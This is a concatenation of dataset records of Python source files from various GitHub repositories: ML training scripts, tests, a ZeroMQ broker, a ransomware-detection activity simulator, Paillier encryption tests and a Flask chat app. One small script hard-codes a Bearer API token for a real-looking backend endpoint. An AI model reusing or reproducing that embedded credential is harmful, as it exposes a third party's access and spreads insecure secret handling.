encoding_tys = []\r\n    if one_hot:\r\n        encoding_tys.append(FeatureEmbeddingTy.ONEHOT)\r\n    if embed:\r\n        encoding_tys.append(FeatureEmbeddingTy.EMBED)\r\n    if rbf:\r\n        encoding_tys.append(FeatureEmbeddingTy.RBF)\r\n    if fourier:\r\n        encoding_tys.append(FeatureEmbeddingTy.FOURIER)\r\n    return encoding_tys\r\n\r\n\r\nclass FeatureName(Enum):\r\n    \"\"\"Identifiers for each feature type\r\n    \"\"\"\r\n    REL_POS = \"rel_pos\"\r\n    
REL_SEP = \"rel_sep\"\r\n    REL_DIST = \"rel_dist\"\r\n    BB_DIHEDRAL = \"bb_dihedral\"\r\n    CENTRALITY = \"centrality\"\r\n    RES_TY = \"res_ty\"\r\n    TR_ORI = \"tr_ori\"\r\n    REL_ORI = \"rel_ori\"\r\n    REL_COORD = \"rel_coord\"\r\n    REL_CHAIN = \"rel_chain\"\r\n    EXTRA_RES = \"extra_res\"\r\n    EXTRA_PAIR = \"extra_pair\"\r\n    SS = \"sec_struct\"\r\n    SC_DIHEDRAL = \"sc_dihedral\"\r\n\r\n\r\nFEATURE_NAMES = [\r\n    FeatureName.REL_POS,\r\n    FeatureName.REL_SEP,\r\n    FeatureName.REL_DIST,\r\n    FeatureName.BB_DIHEDRAL,\r\n    FeatureName.CENTRALITY,\r\n    FeatureName.RES_TY,\r\n    FeatureName.TR_ORI,\r\n    FeatureName.REL_ORI,\r\n    FeatureName.REL_COORD,\r\n    FeatureName.REL_CHAIN,\r\n    FeatureName.EXTRA_RES,\r\n    FeatureName.EXTRA_PAIR,\r\n    FeatureName.SS,\r\n    FeatureName.SC_DIHEDRAL,\r\n]\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/features/feature_config.py","file_name":"feature_config.py","file_ext":"py","file_size_in_byte":16161,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} {"seq_id":"73028068533","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nfrom datetime import datetime, timedelta\n\nfrom airflow.ti_deps.deps.not_in_retry_period_dep import NotInRetryPeriodDep\nfrom airflow.utils.state import State\nfrom fake_models import FakeDag, FakeTask, FakeTI\n\n\nclass NotInRetryPeriodDepTest(unittest.TestCase):\n\n    def test_still_in_retry_period(self):\n        \"\"\"\n        Task instances that are in their retry period should fail this dep\n        \"\"\"\n        dag = FakeDag()\n        task = FakeTask(dag=dag, retry_delay=timedelta(minutes=1))\n        ti = FakeTI(\n            task=task,\n            state=State.UP_FOR_RETRY,\n            end_date=datetime(2016, 1, 1),\n            is_premature=True)\n\n        self.assertFalse(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n\n    def test_retry_period_finished(self):\n        \"\"\"\n        Task instances that have had their retry period elapse should pass this dep\n        \"\"\"\n        dag = FakeDag()\n        task = FakeTask(dag=dag, retry_delay=timedelta(minutes=1))\n        ti = FakeTI(\n            task=task,\n            state=State.UP_FOR_RETRY,\n            end_date=datetime(2016, 1, 1),\n            is_premature=False)\n\n        self.assertTrue(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n\n    def test_not_in_retry_period(self):\n        \"\"\"\n        Task instances that are not up for retry cannot be in their retry period\n        \"\"\"\n        dag = FakeDag()\n        task = FakeTask(dag=dag)\n        ti = FakeTI(task=task, state=State.SUCCESS)\n\n        self.assertTrue(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/apache_incubator-airflow/incubator-airflow-master/tests/ti_deps/deps/not_in_retry_period_dep.py","file_name":"not_in_retry_period_dep.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} {"seq_id":"20043779423","text":"'''\nThis module can be used to train models according to the following training rules\n\tBPTT:\n\tGenetic:\n\tHebian:\n\tFORCE:\n\nAuthor: 
Brandon McMahan\nJune 24, 2019\n'''\n\nimport numpy as np \nfrom rnn import RNN \nimport rnntools as r\nfrom task.williams import Williams \nimport utils\nimport matplotlib.pyplot as plt \nfrom train.bptt import Bptt \nfrom train.genetic import Genetic \nfrom train.hebian_clone import Hebian\nfrom train.force_BM import Force\nfrom FP_Analysis import FindFixedPoints\nfrom task.contexttask import ContextTask\n\n#RNN architecture\ninput_size = 1\nhidden_size = 50\noutput_size = 1\n\n#create the task\ntask = Williams()\ncontext_task = ContextTask()\n\n\ndef TrainBPTT(identifier, hidden_size=hidden_size, num_epochs=2_000, learning_rate=1e-4):\n\tbptt_model = RNN(input_size, hidden_size, output_size, var=0.01)\n\t#train BPTT\n\t\n\t#num_epochs=2_000\n\ttrial_length=40\n\ttrainer=Bptt(bptt_model, task, learning_rate, num_epochs, trial_length)\n\ttrainer.init_network()\n\ttrainer.trainBPTT()\n\tF = bptt_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1], num_hidden=hidden_size)\n\tbptt_model.pca = pca\n\tbptt_model.save('bptt_model'+str(identifier))\n\treturn bptt_model\n\ndef TrainBPTT_context(identifier, hidden_size=hidden_size, num_epochs=10_000, learning_rate=5e-5):\n\tbptt_model = RNN(4, hidden_size, 1, var=0.01)\n\t#train BPTT\n\t\n\ttrial_length=40\n\ttrainer=Bptt(bptt_model, context_task, learning_rate, num_epochs, trial_length)\n\ttrainer.init_network()\n\ttrainer.trainBPTT()\n\t#F = bptt_model.GetF()\n\t#roots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t#\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1], num_hidden=hidden_size)\n\t#bptt_model.pca = pca\n\tbptt_model.save('bptt_context_model'+str(identifier))\n\tplt.plot(bptt_model.losses)\n\tplt.show()\n\treturn bptt_model\n\ndef TrainGenetic(identifier, num_generations=15):\n\tgenetic_model = RNN(input_size, hidden_size, output_size)\n\t#train model using genetic algorithm\n\tnum_pop=50\n\tsigma=0.01\n\t#num_generations=15\n\ttrainer = Genetic(genetic_model, task, num_generations)\n\ttrainer.trainGenetic(num_pop, sigma, batch_size=50, num_parents=5, mutation=0.1)\n\tF = genetic_model.GetF()\n\troots, pca = FindFixedPoints(F, [[1],[0.9],[0.8],[0.7],[0.6],[0.5],[0.4],[0.3],[0.2],[0.1],\\\n\t\t\t\t[-0.1],[-0.2],[-0.3],[-0.4],[-0.5],[-0.6],[-0.7],[-0.8],[-0.9],[-1]])\n\tgenetic_model.pca = pca\n\tgenetic_model.save('genetic_model'+str(identifier))\n\treturn genetic_model\n\n\ndef TrainHebian(identifier, num_epochs=2_000):\n\thebian_model = RNN(input_size, hidden_size, output_size)\n\t#train model using Hebian learning\n\ttrainer = Hebian(hebian_model, task, alpha_trace = 0.5)\n\ttrainer.TrainHebbian(num_trials=num_epochs)\n\tF = hebian_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1])\n\thebian_model.pca = pca\n\thebian_model.save('hebian_model'+str(identifier))\n\treturn hebian_model\n\n\ndef TrainFORCE(identifier, num_epochs=2_000):\n\tforce_model = RNN(input_size, hidden_size, output_size)\n\t#train model using FORCE\n\ttrainer = Force(force_model, task, alpha=1000)\n\ttrainer.trainForce(num_trials=num_epochs)\n\tF = force_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1])\n\tforce_model.pca = pca\n\tforce_model.save('force_model'+str(identifier))\n\treturn 
force_model\n","repo_name":"bmcmahan2016/RNN_Learning","sub_path":"train_models.py","file_name":"train_models.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365813814","text":"import json\r\nimport requests\r\n\r\nurl = \"https://backend.coreproject.moe/api/v1/anime\"\r\nheaders = {\"accept\": \"application/json\", \"Authorization\": \"Bearer uBRFvhuEDUiuviXU\"}\r\nfiles = {\r\n \"banner\": open(\"image.webp\", \"rb\"),\r\n \"cover\": open(\"image.webp\", \"rb\"),\r\n}\r\ndata = {\r\n \"aired_from\": \"1998-04-03T00:00:00Z\",\r\n \"anilist_id\": 1,\r\n \"producers\": [2, 3],\r\n \"mal_id\": 1,\r\n \"kitsu_id\": 1,\r\n \"name_japanese\": \"fadsfasd\",\r\n \"themes\": [1, 2],\r\n \"name\": \"fdafsdfa\",\r\n \"name_synonyms\": \"baka,dasf\",\r\n \"genres\": [1, 2],\r\n \"aired_to\": \"1998-04-03T00:00:00Z\",\r\n \"synopsis\": \"dfadfadsfa\",\r\n \"source\": \"3dsffasfas\",\r\n \"studios\": [1, 2],\r\n \"rating\": 11,\r\n}\r\ndata = json.dumps(data)\r\nprint(data)\r\nresponse = requests.post(url, headers=headers, files=files, data=data)\r\nprint(response.json())\r\n","repo_name":"baseplate-admin/CoreProject","sub_path":"tools/seeder/seeders/automation/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"8548269036","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 2014-01-19T19:39+08:00\n# http://blog.csdn.net/ubiter/article/details/19809145\n\nfrom re import compile as re_compile\n\n_percent_pat = re_compile(b'((?:%[A-Fa-f0-9]{2})+)')\n_unreserved_chars = frozenset(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n b'abcdefghijklmnopqrstuvwxyz'\n b'0123456789'\n b'_.-')\n\n# A simple implement of \"urllib.parse.unquote\"\ndef percent_decode(string, encoding = 'utf-8', errors = 'replace'):\n str_bytes = string.encode('utf-8')\n hex_to_byte = lambda match_ret: \\\n bytes.fromhex(\n match_ret.group(0).replace(b'%', b'').decode('utf-8'))\n str_bytes = _percent_pat.sub(hex_to_byte, str_bytes)\n string = str_bytes.decode(encoding, errors)\n return string\n\n# A simple implement of \"urllib.parse.unquote_plus\"\ndef percent_decode_plus(string, encoding = 'utf-8', errors = 'replace'):\n return percent_decode(string.replace('+', '%20'), encoding, errors)\n\n# A simple implement of \"urllib.parse.quote\"\ndef percent_encode(string, safe = '/', encoding = 'utf-8', errors = 'strict'):\n if not string:\n return string\n string = string.encode(encoding, errors)\n bytes_unchanged = _unreserved_chars.union(\n safe.encode('ascii', 'ignore'))\n process_byte = lambda byte: chr(byte) if byte in bytes_unchanged \\\n else '%{:02X}'.format(byte)\n return ''.join((process_byte(b) for b in string))\n\n# A simple implement of \"urllib.parse.quote_plus\"\ndef percent_encode_plus(string, safe = '', encoding = 'utf-8',\n errors = 'strict'):\n safe += ' '\n string = percent_encode(string, safe, encoding, errors)\n return string.replace(' ', '+')\n\nif __name__ == '__main__':\n import unittest\n import urllib.parse\n\n class TestURIParse(unittest.TestCase):\n def setUp(self):\n pass\n def tearDown(self):\n pass\n def doTest(self, str_, str_with_space, encoding_list):\n for en in encoding_list:\n # print('Test encoding:', en)\n\n str_enc = percent_encode(str_, encoding = en)\n self.assertEqual(\n str_enc, urllib.parse.quote(str_, encoding = en))\n\n str_with_space_enc 
= percent_encode_plus(\n str_with_space, encoding = en)\n self.assertEqual(\n str_with_space_enc,\n urllib.parse.quote_plus(str_with_space, encoding = en))\n\n # print('Test decoding:', en)\n self.assertEqual(percent_decode(str_enc, encoding = en),\n urllib.parse.unquote(str_enc, encoding = en))\n self.assertEqual(\n percent_decode(str_with_space_enc, encoding = en),\n urllib.parse.unquote(str_with_space_enc, encoding = en))\n self.assertEqual(\n percent_decode_plus(str_with_space_enc, encoding = en),\n urllib.parse.unquote_plus(\n str_with_space_enc, encoding = en))\n def testChinese(self):\n fn = 'Beyond-海阔天空'\n fn_with_space = 'Beyond 海 阔 天 空'\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be',\n 'gb18030')\n self.doTest(fn, fn_with_space, encoding_list)\n def testReservedChars(self):\n reserved_chars = \"!*'();:@&=+$,/?#[]\"\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be',\n 'gb18030')\n self.doTest(reserved_chars, reserved_chars, encoding_list)\n def testEmptyString(self):\n self.doTest('', '', ('utf-8', 'utf-16-be', 'utf-32-le'))\n def testURL(self):\n url = 'http://www.baidu.com/'\n url_with_space = 'http://www.baidu.com/黑 客 帝 国.rmvb'\n encoding_list = ('utf-8', 'gb2312', 'gbk', 'utf-16', 'utf-16-le',\n 'utf-32', 'utf-32-le', 'gb18030')\n self.doTest(url, url_with_space, encoding_list)\n def testFileName(self):\n file_name = '%5B%E9%81%93%E5%BE%B7%E6%83%85%E6%93%8D%E8%AE%BA%5D.%E4%B8%AD%E5%A4%AE%E7' \\\n '%BC%96%E8%AF%91%E5%87%BA%E7%89%88%E7%A4%BE%EF%BC%88%E8%B0%A2%E5%AE%97%E6%9E' \\\n '%97%E8%AF%91%29'\n self.assertEqual(percent_decode(file_name),\n urllib.parse.unquote(file_name))\n def testRealURL(self):\n wiki_page = 'http://zh.wikipedia.org/wiki/%E7%99%BE%E5%88%86%E5%8F%B7%E7%BC%96%E7%A0%81'\n self.assertEqual(percent_decode(wiki_page),\n urllib.parse.unquote(wiki_page))\n \n unittest.main()\n\n\n# References:\n# https://www.codeproject.com/Articles/7828/CHttpClient-A-Helper-Class-Using-WinInet\n# https://github.com/ProgerXP/Notepad2e/blob/master/src/Extension/StrToURL.c\n# https://github.com/bonsmile/lxd/blob/main/encoding.cpp\n","repo_name":"myd7349/Ongoing-Study","sub_path":"python/uriparse.py","file_name":"uriparse.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"74807722612","text":"import argparse\nimport zmq\nimport sys\nimport time\nfrom signal import signal, SIGINT\nfrom threading import Thread\n\nfrom zmq_api import (\n\tlisten_for_pub_data,\n\tlisten_for_pub_registration,\n\tlisten_for_sub_registration,\n\tlisten_for_pub_discovery_req,\n\tpublish_to_sub,\n\tregister_broker,\n\tdisconnect,\n)\n\nprint(f\"Current libzmq version is {zmq.zmq_version()}\")\nprint(f\"Current pyzmq version is {zmq.__version__}\")\n\nparser = argparse.ArgumentParser ()\nparser.add_argument (\"-zk\", \"--zookeeper_ip\", type=str, default=\"10.0.0.7\", help=\"Zookeeper IP Address\")\nparser.add_argument (\"-zp\", \"--zookeeper_port\", type=int, default=2181, help=\"Zookeeper Port\")\nparser.add_argument (\"-m\", \"--max_pub_count\", type=int, default=-1, help=\"Maximum number of data propagations through broker.\")\nparser.add_argument (\"-k\", \"--keep_alive\", type=int, default=-1, help=\"Time to keep the broker alive.\")\nparser.add_argument (\"-a\", \"--auto_mode\", default=False, action=\"store_true\")\nargs = parser.parse_args ()\n\nthreads = 
[]\nterminating = False\n\ndef handler(signal_received, frame):\n\tglobal terminating\n\t# Handle any cleanup here\n\tprint('SIGINT or CTRL-C detected. Exiting gracefully')\n\tterminating = True\n\tdisconnect()\n\texit(0)\n\nsignal(SIGINT, handler)\n\ndef register_subs():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_sub_registration()\n\texcept:\n\t\tprint(\"Sub registration listener ended\")\n\n\ndef register_pubs():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_pub_registration()\n\texcept:\n\t\tprint(\"Pub registration listener ended\")\n\ndef process_discovery():\n\tglobal terminating\n\ttry:\n\t\twhile not terminating:\n\t\t\t# Listen for new subs to come onto the system\n\t\t\tlisten_for_pub_discovery_req()\n\texcept:\n\t\t\tprint(\"Pub discovery listener ended\")\n\ndef pub_data_processor():\n\tglobal terminating\n\tmax_pub_count = args.max_pub_count\n\tpub_count = 0\n\ttry:\n\t\twhile not terminating:\n\t\t# Break if we have exceeded the maximuim count\n\t\t\tif (max_pub_count != -1 and pub_count >= max_pub_count):\n\t\t\t\tprint(\"max pub count hit\")\n\t\t\t\tterminating = True\n\t\t\t\tdisconnect()\n\t\t\t\tsys.exit(0)\n\n\t\t\t\tbreak\n\t\t\t#else:\n\t\t\t#\tprint(f\"Max: {max_pub_count}, current: {pub_count}\")\n\n\t\t\treceive_pub_data()\n\t\t\tpub_count += 1\n\texcept:\n\t\tprint(\"Data propagator ended\")\t\t\t\n\ndef receive_pub_data():\n\t# Get the pub message\n\tstring = listen_for_pub_data()\n\n\tif string != None:\n\t\t# Forward published data to the appropriate subs\n\t\tpublish_to_sub(string)\n\n\n# Register broker\n#zk_ip = \"10.0.0.7\"\nzk_ip = args.zookeeper_ip\nzk_port = args.zookeeper_port\nregister_broker(zk_ip,zk_port)\n\n# Start new listener for subs\nt = Thread(target=register_subs, args=())\nt.start()\nthreads.append(t)\n\nt = Thread(target=register_pubs, args=())\nt.start()\nthreads.append(t)\n\n# Start new listener for discovery requests\nt = Thread(target=process_discovery, args=())\nt.start()\nthreads.append(t)\n\n# Start pub data listener\nt = Thread(target=pub_data_processor, args=())\nt.start()\nthreads.append(t)\n\n#if not args.auto_mode:\n\nif args.keep_alive == -1:\n\t#while True:\n\t#\tpass\n\t# Wait for input to kill the broker and terminate connections\n\tinput (\"Disconnect from the server -- Press any key to continue\")\n\tprint(\"Disconnected from the server\")\n\tterminating = True\n\tdisconnect()\n\tsys.exit(0)\nelse:\n\ttime.sleep(args.keep_alive)\n\tprint(\"Disconnected from the server\")\n\tterminating = True\n\tdisconnect()\n\tsys.exit(0)\n","repo_name":"jdunn-git/Pub-Sub-Load-Balancing","sub_path":"assignment2/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39522744692","text":"from math import ceil\nimport time\nimport random\nfrom encryption import populate_file\n\n\ndef write_net_data(n_filename, url_list):\n n_outfile = open(n_filename, 'a+')\n \n url = random.choice(url_list)\n \n n_outfile.write(url)\n n_outfile.close()\n\n\n\n\n\n\nif __name__ == '__main__':\n switch_time = 0\n\n run_default = (input('Run default? 
(y/n) ') == 'y')\n if run_default:\n d_filename = 'encryption/mem_data.txt'\n n_filename = 'network/net_data.txt'\n n_good_filepath = 'network/good_urls.txt'\n n_bad_filepath = 'network/bad_urls.txt'\n \n else:\n d_filename = input(\"Data Filename: \").strip()\n n_filename = input(\"Network output filename: \").strip()\n n_good_filepath = input(\"Good network file path: \").strip()\n n_bad_filepath = input(\"Bad network file path: \").strip()\n \n time_to_run = float(input(\"time to run: \").strip())*60\n attack_switch = (input('Attack switch? (y/n) ').strip() == 'y')\n if(attack_switch):\n switch_time = float(input(\"switch time: \").strip())*60\n \n\n url_list = open(n_good_filepath, 'r+').readlines()\n bad_file = open(n_bad_filepath, 'r+')\n\n attack = False\n start = time.time()\n\n while(time.time()-start < time_to_run):\n print(f\"\\rrunning: {ceil(((time.time()-start)/time_to_run)*100)}%\" , end=' ')\n \n if(not attack and attack_switch and time.time() - start > switch_time):\n print(f\"\\rSwitching to attack at\", time.strftime(\"%H:%M:%S\",time.localtime()), \"\\t\\t\\t\")\n attack = True\n bad_urls = bad_file.readlines()\n write_net_data(n_filename, bad_urls)\n url_list.extend(bad_urls)\n \n populate_file.write_file(attack=attack, filename=d_filename)\n write_net_data(n_filename,url_list)\n\n print(\"Complete!\")","repo_name":"Scottie-Fischer/ransomwaredetection_v2","sub_path":"activity_sim.py","file_name":"activity_sim.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13588422412","text":"import argparse\nimport os\nimport json\nimport SimpleITK as sitk\nfrom tqdm import tqdm\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--json_path\")\n parser.add_argument(\"--output_json_path\")\n parser.add_argument(\"--source_key\")\n parser.add_argument(\"--output_key\")\n parser.add_argument(\"--condition\")\n\n args = parser.parse_args()\n\n df = json.load(open(args.json_path))\n\n condition_key, condition_value = args.condition.split(\"==\")\n\n for key in tqdm(df):\n if args.source_key in df[key]:\n if args.output_key not in df[key]:\n if condition_key in df[key]:\n if str(df[key][condition_key]) == condition_value:\n path = df[key][args.source_key]\n image = sitk.ReadImage(path) * 0\n dir = os.sep.join(os.path.split(path)[:-1])\n output_path = f\"{dir}/mask_filled.nii.gz\"\n sitk.WriteImage(image, output_path)\n df[key][args.output_key] = output_path\n\n with open(args.output_json_path, \"w\") as o:\n json.dump(df, o, indent=2)\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"utils/fill_with_condition.py","file_name":"fill_with_condition.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"18921307067","text":"import os\nimport requests\nimport time\n\n#download method\ndef download_file(url, filename):\n ''' Downloads file from the url and save it as filename '''\n # check if file already exists\n if not os.path.isfile(filename):\n print('Downloading File')\n response = requests.get(url)\n # Check if the response is ok (200)\n if response.status_code == 200:\n # Open file and write the content\n with open(filename, 'wb') as file:\n # A chunk of 128 bytes\n for chunk in response:\n file.write(chunk)\n time.sleep(1)\n else:\n print('File 
exists')","repo_name":"PhilMcDaniel/rocket-league-stats","sub_path":"personal-python/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70742599733","text":"from fastapi.testclient import TestClient\n\nfrom src.schema import StatusMessage\n\nexpected_message = StatusMessage(\n power=600,\n time=60,\n state=\"off\",\n)\n\n\ndef test_status_off(clear_state):\n from src.main import app\n\n client = TestClient(app)\n response = client.get(\"/status\")\n print(response.json())\n assert response.status_code == 200\n assert response.json() == dict(expected_message)\n","repo_name":"mszpulak/roche","sub_path":"src/tests/test_status.py","file_name":"test_status.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25066230003","text":"import unittest\nimport numpy as np\nimport time\n\nimport paillier\n\n\nclass PaiTestCase(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(PaiTestCase, self).__init__(*args, **kwargs)\n self.pai = paillier.Paillier(2048, 10)\n pk, vk = self.pai.gen_key_generate_key_pair()\n self.pk = pk\n self.vk = vk\n self.row = 10\n self.col = 10\n self.value = np.random.randint(-100000, 100000, (self.row, self.col))\n self.plain = np.random.randint(-100000, 100000, (self.row * self.col,))\n\n def test_pai_batch_enc(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n self.assertEqual(cipher_text.shape[0], self.row*self.col)\n\n def test_pai_batch_dec(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # decrypt self.value\n decrypt_value = self.pai.batch_decrypt(cipher_text, self.pk, self.vk)\n self.value = self.value.astype(np.str).flatten().tolist()\n self.assertEqual(decrypt_value, self.value)\n\n def test_pai_sum(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt sum\n cipher_sum = self.pai.cipher_sum(cipher_text, self.pk)\n decrypt_sum = self.pai.decrypt(cipher_sum, self.pk, self.vk)\n self.assertEqual(decrypt_sum, np.sum(self.value).astype(np.str))\n\n def test_pai_batch_mul(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt self.value * plain\n cipher_mul_plain = self.pai.batch_mul(cipher_text, self.plain, self.pk)\n # decrypt self.value * plain\n decrypt_mul_plain = self.pai.batch_decrypt(cipher_mul_plain, self.pk, self.vk)\n for i in range(self.row):\n for j in range(self.col):\n self.assertEqual(decrypt_mul_plain[i*self.row+j], str(self.value[i][j]*self.plain[i*self.row+j]))\n\n\nclass PaiTimeTestCase(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(PaiTimeTestCase, self).__init__(*args, **kwargs)\n self.pai = paillier.Paillier(2048, 32)\n pk, vk = self.pai.gen_key_generate_key_pair()\n self.pk = pk\n self.vk = vk\n self.row = 100\n self.col = 100\n self.value = np.random.randint(-100000, 100000, (self.row, self.col))\n self.plain = np.random.randint(-100000, 100000, (self.row * self.col,))\n\n def setUp(self):\n self.startTime = time.time()\n\n def tearDown(self):\n t = time.time() - self.startTime\n print('%s: %.3f' % (self.id(), t))\n\n def test_pai_batch_enc_time(self):\n self.pai.batch_encrypt(self.value, self.pk)\n\n def test_pai_batch_dec(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # decrypt self.value\n self.startTime 
= time.time()\n self.pai.batch_decrypt(cipher_text, self.pk, self.vk)\n\n def test_pai_sum(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt sum\n self.startTime = time.time()\n self.pai.cipher_sum(cipher_text, self.pk)\n\n def test_pai_batch_mul(self):\n # encrypt\n cipher_text = self.pai.batch_encrypt(self.value, self.pk)\n # encrypt self.value * plain\n self.startTime = time.time()\n self.pai.batch_mul(cipher_text, self.plain, self.pk)\n\n\ndef pai_suite():\n suite = unittest.TestSuite()\n suite.addTest(PaiTestCase(\"test_pai_batch_enc\"))\n suite.addTest(PaiTestCase(\"test_pai_batch_dec\"))\n suite.addTest(PaiTestCase(\"test_pai_sum\"))\n suite.addTest(PaiTestCase(\"test_pai_batch_mul\"))\n return suite\n\n\ndef pai_time_suite():\n suite = unittest.TestSuite()\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_enc_time\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_dec\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_sum\"))\n suite.addTest(PaiTimeTestCase(\"test_pai_batch_mul\"))\n return suite\n\n\nif __name__ == '__main__':\n runner = unittest.TextTestRunner(verbosity=0)\n runner.run(pai_suite())\n runner.run(pai_time_suite())\n\n","repo_name":"FancyXun/federated-learning-module","sub_path":"libpts/python/api/paillier_test.py","file_name":"paillier_test.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3971761275","text":"import numpy as np\nimport scipy.linalg as la\n\n### Calculates block cholesky decomposition\n\n\ndef block_chol(L,x):\n B = x[:-1]\n d = x[-1]\n tri = la.solve_triangular(L,B,check_finite = False, lower = True)\n return(np.block([\n [L, np.zeros((len(B),1))],\n [tri,np.sqrt(d - np.dot(tri,tri))]\n ]))\n\n\n# Calculates nearest semi-positive definite matrix w.r.t. 
the Frobenius norm (algorithm based on Nick Higham's\n# \"Computing the nearest correlation matrix - a problem from finance\"\n\n\ndef nearestSPD(A):\n    B = (A + A.T) / 2\n    _, s, V = la.svd(B)\n\n    H = np.dot(V.T, np.dot(np.diag(s), V))\n\n    A2 = (B + H) / 2\n    A3 = (A2 + A2.T) / 2\n\n    if isPD(A3):\n        return A3\n\n    spacing = np.spacing(la.norm(A))\n\n    I = np.eye(A.shape[0])\n    k = 1\n    while not isPD(A3):\n        mineig = np.min(np.real(la.eigvals(A3)))\n        A3 += I * (-mineig * k ** 2 + spacing)\n        k += 1\n    if la.norm(A - A3, ord='fro') / la.norm(A3, ord='fro') > 10:\n        print(\"Matrix failed to be positive definite, distance in Frobenius norm: \",\n              la.norm(A - A3, ord='fro') / la.norm(A3, ord='fro'))\n    return A3\n\n\n### Checks if input matrix is positive definite\n\n\ndef isPD(B):\n    try:\n        _ = la.cholesky(B)\n        return True\n    except la.LinAlgError:\n        return False\n","repo_name":"MatthewAlexanderFisher/LocalABC","sub_path":"LocalABC/util/lina.py","file_name":"lina.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} {"seq_id":"34423077583","text":"# Framework -> Flask\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\n# functionality for sending messages\n@socketio.on(\"message\")\ndef gerenciar_mensagem(mensagem):\n    send(mensagem, broadcast=True)\n\n\n# create our first page = 1st route\n@app.route(\"/\") # decorator - attaches a functionality to what is below it, the function\ndef homepage():\n    return render_template(\"homepage.html\")\n\n# run our application\nsocketio.run(app, host=\"192.168.100.2\")","repo_name":"rigsjf/rep_jornada_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 